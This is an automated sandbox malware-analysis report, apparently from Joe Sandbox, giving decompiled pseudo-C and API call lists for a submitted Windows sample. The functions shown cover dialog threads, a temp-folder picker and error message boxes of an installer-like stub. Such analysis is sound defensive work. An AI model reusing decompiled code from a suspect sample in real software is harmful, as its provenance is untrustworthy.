                                                                                                                                                                                                        0x00de3637
                                                                                                                                                                                                        0x00de363d
                                                                                                                                                                                                        0x00de3642
                                                                                                                                                                                                        0x00de3644
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3646
                                                                                                                                                                                                        0x00de3652
                                                                                                                                                                                                        0x00de3657
                                                                                                                                                                                                        0x00de3658
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3658
                                                                                                                                                                                                        0x00de3644
                                                                                                                                                                                                        0x00de351b
                                                                                                                                                                                                        0x00de351d
                                                                                                                                                                                                        0x00de354f
                                                                                                                                                                                                        0x00de3553
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de355f
                                                                                                                                                                                                        0x00de3565
                                                                                                                                                                                                        0x00de357c
                                                                                                                                                                                                        0x00de3581
                                                                                                                                                                                                        0x00de3584
                                                                                                                                                                                                        0x00de359b
                                                                                                                                                                                                        0x00de35a1
                                                                                                                                                                                                        0x00de35a7
                                                                                                                                                                                                        0x00de35ad
                                                                                                                                                                                                        0x00de35b3
                                                                                                                                                                                                        0x00de35b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de35b8
                                                                                                                                                                                                        0x00de3586
                                                                                                                                                                                                        0x00de3588
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3590
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3590
                                                                                                                                                                                                        0x00de3524
                                                                                                                                                                                                        0x00de3535
                                                                                                                                                                                                        0x00de3541
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3549
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 00DE3535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00DE3541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 00DE355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(00DE1140,00000000,00000020,00000004), ref: 00DE3590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00DE35C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00DE35F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00DE35F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00DE3610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00DE3617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00DE3623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00DE3637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00DE3671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 2406144884-3940384054
                                                                                                                                                                                                        • Opcode ID: ae6584ca5d556b6a3fe9399ecc23aee44aab62c02f30aff1812f0b2e75dc8e81
                                                                                                                                                                                                        • Instruction ID: 58ff4e9abb3500d3b105c2b94178635c488002bf4622a5bf203a7b63306d4b64
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae6584ca5d556b6a3fe9399ecc23aee44aab62c02f30aff1812f0b2e75dc8e81
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E031A2312403C1BBD7203F3AAC8DE3A3A69E785B01F54452DF646DE3A0CA719900DB75
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E00DE4224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E00DE44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t76 =  *0xde88c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0xde87a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0xde8598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E00DE4200;
                                                                                                                                                                                                        					_v28 = 0xde88c0;
                                                                                                                                                                                                        					 *0xdea288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0xdea288(_t32, 0xde88c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0xde88c0 != 0) {
                                                                                                                                                                                                        							E00DE1680(0xde87a0, 0x104, 0xde88c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xdea288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0xde87a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0xde88c0);
                                                                                                                                                                                                        					_t61 = 0xde88c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0xde88c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0xde88c0; // 0x1bd1181
                                                                                                                                                                                                        					_t44 = CharPrevA(0xde88c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xde88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x00de4234
                                                                                                                                                                                                        0x00de423c
                                                                                                                                                                                                        0x00de4240
                                                                                                                                                                                                        0x00de43b2
                                                                                                                                                                                                        0x00de43b7
                                                                                                                                                                                                        0x00de43c0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de43c5
                                                                                                                                                                                                        0x00de424c
                                                                                                                                                                                                        0x00de4252
                                                                                                                                                                                                        0x00de4257
                                                                                                                                                                                                        0x00de43a4
                                                                                                                                                                                                        0x00de43a5
                                                                                                                                                                                                        0x00de43ab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de43ab
                                                                                                                                                                                                        0x00de4263
                                                                                                                                                                                                        0x00de4269
                                                                                                                                                                                                        0x00de426e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de427a
                                                                                                                                                                                                        0x00de4280
                                                                                                                                                                                                        0x00de4285
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de428d
                                                                                                                                                                                                        0x00de4293
                                                                                                                                                                                                        0x00de42e6
                                                                                                                                                                                                        0x00de42e9
                                                                                                                                                                                                        0x00de42ef
                                                                                                                                                                                                        0x00de42f4
                                                                                                                                                                                                        0x00de42f7
                                                                                                                                                                                                        0x00de4300
                                                                                                                                                                                                        0x00de4307
                                                                                                                                                                                                        0x00de430e
                                                                                                                                                                                                        0x00de4315
                                                                                                                                                                                                        0x00de431c
                                                                                                                                                                                                        0x00de4322
                                                                                                                                                                                                        0x00de4326
                                                                                                                                                                                                        0x00de432d
                                                                                                                                                                                                        0x00de432d
                                                                                                                                                                                                        0x00de432f
                                                                                                                                                                                                        0x00de4334
                                                                                                                                                                                                        0x00de4343
                                                                                                                                                                                                        0x00de4349
                                                                                                                                                                                                        0x00de434d
                                                                                                                                                                                                        0x00de4354
                                                                                                                                                                                                        0x00de4354
                                                                                                                                                                                                        0x00de435d
                                                                                                                                                                                                        0x00de436e
                                                                                                                                                                                                        0x00de436e
                                                                                                                                                                                                        0x00de437d
                                                                                                                                                                                                        0x00de4383
                                                                                                                                                                                                        0x00de4387
                                                                                                                                                                                                        0x00de438e
                                                                                                                                                                                                        0x00de438e
                                                                                                                                                                                                        0x00de4387
                                                                                                                                                                                                        0x00de4391
                                                                                                                                                                                                        0x00de4399
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4295
                                                                                                                                                                                                        0x00de429f
                                                                                                                                                                                                        0x00de42a5
                                                                                                                                                                                                        0x00de42aa
                                                                                                                                                                                                        0x00de42aa
                                                                                                                                                                                                        0x00de42ad
                                                                                                                                                                                                        0x00de42ad
                                                                                                                                                                                                        0x00de42af
                                                                                                                                                                                                        0x00de42b0
                                                                                                                                                                                                        0x00de42b6
                                                                                                                                                                                                        0x00de42c2
                                                                                                                                                                                                        0x00de42c8
                                                                                                                                                                                                        0x00de42ce
                                                                                                                                                                                                        0x00de42e4
                                                                                                                                                                                                        0x00de42e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de42ce

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00DE4236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00DE424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00DE4263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00DE427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,00DE88C0,?,00000001), ref: 00DE429F
                                                                                                                                                                                                        • CharPrevA.USER32(00DE88C0,01BD1181,?,00000001), ref: 00DE42C2
                                                                                                                                                                                                        • CharPrevA.USER32(00DE88C0,00000000,?,00000001), ref: 00DE42D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00DE4391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00DE43A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: 494ecf9f9f01dee6e921dcae693ebe3ce5dc1115917eaecfa80f165980b05dd2
                                                                                                                                                                                                        • Instruction ID: d3c70bec90c8617a8c11f6bfef3a6b0dbde9f187017aa05a39ece9e94b29d96d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 494ecf9f9f01dee6e921dcae693ebe3ce5dc1115917eaecfa80f165980b05dd2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7411274A003C1AFD711BF66ECC8A6E7BB4EB44344F08006AEA49AB351CB748C05D776
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00DE44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0xde8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xde9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                        					if(_v576 != 0) {
                                                                                                                                                                                                        						_t73 =  &_v576;
                                                                                                                                                                                                        						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                        						_t75 = _t16;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t43 =  *_t73;
                                                                                                                                                                                                        							_t73 = _t73 + 1;
                                                                                                                                                                                                        						} while (_t43 != 0);
                                                                                                                                                                                                        						_t84 = _v580;
                                                                                                                                                                                                        						_t74 = _t73 - _t75;
                                                                                                                                                                                                        						if(_t84 == 0) {
                                                                                                                                                                                                        							if(_t67 == 0) {
                                                                                                                                                                                                        								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                        								_t83 = _t27;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t75 = _t83;
                                                                                                                                                                                                        									_t74 = _t80;
                                                                                                                                                                                                        									E00DE1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t76 = _t67;
                                                                                                                                                                                                        								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                        								_t85 = _t24;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t55 =  *_t76;
                                                                                                                                                                                                        									_t76 = _t76 + 1;
                                                                                                                                                                                                        								} while (_t55 != 0);
                                                                                                                                                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                        								_t83 = _t25 + _t74;
                                                                                                                                                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                        								_t80 = _t44;
                                                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                                                        									goto L6;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00DE171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t77 = _t67;
                                                                                                                                                                                                        							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                        							_t81 = _t18;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t58 =  *_t77;
                                                                                                                                                                                                        								_t77 = _t77 + 1;
                                                                                                                                                                                                        							} while (_t58 != 0);
                                                                                                                                                                                                        							_t75 = _t77 - _t81;
                                                                                                                                                                                                        							_t82 = _t84 + 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t59 =  *_t84;
                                                                                                                                                                                                        								_t84 = _t84 + 1;
                                                                                                                                                                                                        							} while (_t59 != 0);
                                                                                                                                                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                        							_t80 = _t44;
                                                                                                                                                                                                        							if(_t80 == 0) {
                                                                                                                                                                                                        								goto L6;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_push(_v580);
                                                                                                                                                                                                        								E00DE171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                        								L23:
                                                                                                                                                                                                        								MessageBeep(_a12);
                                                                                                                                                                                                        								if(E00DE681F(_t67) == 0) {
                                                                                                                                                                                                        									L25:
                                                                                                                                                                                                        									_t49 = 0x10000;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t54 = E00DE67C9(_t74, _t74);
                                                                                                                                                                                                        									_t49 = 0x190000;
                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16);
                                                                                                                                                                                                        								_t83 = _t52;
                                                                                                                                                                                                        								LocalFree(_t80);
                                                                                                                                                                                                        								_t39 = _t52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(E00DE681F(_t67) == 0) {
                                                                                                                                                                                                        							L4:
                                                                                                                                                                                                        							_t64 = 0x10010;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t66 = E00DE67C9(0, 0);
                                                                                                                                                                                                        							_t64 = 0x190010;
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								goto L4;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                        			}



































                                                                                                                                                                                                        0x00de44b9
                                                                                                                                                                                                        0x00de44c4
                                                                                                                                                                                                        0x00de44cb
                                                                                                                                                                                                        0x00de44d8
                                                                                                                                                                                                        0x00de44e4
                                                                                                                                                                                                        0x00de44eb
                                                                                                                                                                                                        0x00de44ee
                                                                                                                                                                                                        0x00de44ef
                                                                                                                                                                                                        0x00de44ef
                                                                                                                                                                                                        0x00de44f1
                                                                                                                                                                                                        0x00de44f7
                                                                                                                                                                                                        0x00de44f8
                                                                                                                                                                                                        0x00de467b
                                                                                                                                                                                                        0x00de44fe
                                                                                                                                                                                                        0x00de4509
                                                                                                                                                                                                        0x00de4518
                                                                                                                                                                                                        0x00de4525
                                                                                                                                                                                                        0x00de4562
                                                                                                                                                                                                        0x00de4568
                                                                                                                                                                                                        0x00de4568
                                                                                                                                                                                                        0x00de456b
                                                                                                                                                                                                        0x00de456b
                                                                                                                                                                                                        0x00de456d
                                                                                                                                                                                                        0x00de456e
                                                                                                                                                                                                        0x00de4572
                                                                                                                                                                                                        0x00de4578
                                                                                                                                                                                                        0x00de457c
                                                                                                                                                                                                        0x00de45cb
                                                                                                                                                                                                        0x00de4607
                                                                                                                                                                                                        0x00de4607
                                                                                                                                                                                                        0x00de460d
                                                                                                                                                                                                        0x00de4613
                                                                                                                                                                                                        0x00de4617
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de461d
                                                                                                                                                                                                        0x00de4623
                                                                                                                                                                                                        0x00de4626
                                                                                                                                                                                                        0x00de4628
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4628
                                                                                                                                                                                                        0x00de45cd
                                                                                                                                                                                                        0x00de45cd
                                                                                                                                                                                                        0x00de45cf
                                                                                                                                                                                                        0x00de45cf
                                                                                                                                                                                                        0x00de45d2
                                                                                                                                                                                                        0x00de45d2
                                                                                                                                                                                                        0x00de45d4
                                                                                                                                                                                                        0x00de45d5
                                                                                                                                                                                                        0x00de45db
                                                                                                                                                                                                        0x00de45de
                                                                                                                                                                                                        0x00de45e3
                                                                                                                                                                                                        0x00de45e9
                                                                                                                                                                                                        0x00de45ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de45f3
                                                                                                                                                                                                        0x00de45fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de4602
                                                                                                                                                                                                        0x00de45ed
                                                                                                                                                                                                        0x00de457e
                                                                                                                                                                                                        0x00de457e
                                                                                                                                                                                                        0x00de4580
                                                                                                                                                                                                        0x00de4580
                                                                                                                                                                                                        0x00de4583
                                                                                                                                                                                                        0x00de4583
                                                                                                                                                                                                        0x00de4585
                                                                                                                                                                                                        0x00de4586
                                                                                                                                                                                                        0x00de458a
                                                                                                                                                                                                        0x00de458c
                                                                                                                                                                                                        0x00de458f
                                                                                                                                                                                                        0x00de458f
                                                                                                                                                                                                        0x00de4591
                                                                                                                                                                                                        0x00de4592
                                                                                                                                                                                                        0x00de459b
                                                                                                                                                                                                        0x00de459e
                                                                                                                                                                                                        0x00de45a3
                                                                                                                                                                                                        0x00de45a9
                                                                                                                                                                                                        0x00de45ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de45af
                                                                                                                                                                                                        0x00de45af
                                                                                                                                                                                                        0x00de45bf
                                                                                                                                                                                                        0x00de462d
                                                                                                                                                                                                        0x00de4630
                                                                                                                                                                                                        0x00de463d
                                                                                                                                                                                                        0x00de464e
                                                                                                                                                                                                        0x00de464e
                                                                                                                                                                                                        0x00de463f
                                                                                                                                                                                                        0x00de4640
                                                                                                                                                                                                        0x00de4647
                                                                                                                                                                                                        0x00de464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de464c
                                                                                                                                                                                                        0x00de4666
                                                                                                                                                                                                        0x00de466d
                                                                                                                                                                                                        0x00de466f
                                                                                                                                                                                                        0x00de4675
                                                                                                                                                                                                        0x00de4675
                                                                                                                                                                                                        0x00de45ad
                                                                                                                                                                                                        0x00de4527
                                                                                                                                                                                                        0x00de452e
                                                                                                                                                                                                        0x00de453f
                                                                                                                                                                                                        0x00de453f
                                                                                                                                                                                                        0x00de4530
                                                                                                                                                                                                        0x00de4531
                                                                                                                                                                                                        0x00de4538
                                                                                                                                                                                                        0x00de453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de453d
                                                                                                                                                                                                        0x00de4554
                                                                                                                                                                                                        0x00de455a
                                                                                                                                                                                                        0x00de455a
                                                                                                                                                                                                        0x00de455a
                                                                                                                                                                                                        0x00de4525
                                                                                                                                                                                                        0x00de468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00DE45A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00DE45E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00DE460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00DE4630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00DE4666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00DE466F
                                                                                                                                                                                                          • Part of subcall function 00DE681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00DE686E
                                                                                                                                                                                                          • Part of subcall function 00DE681F: GetSystemMetrics.USER32(0000004A), ref: 00DE68A7
                                                                                                                                                                                                          • Part of subcall function 00DE681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00DE68CC
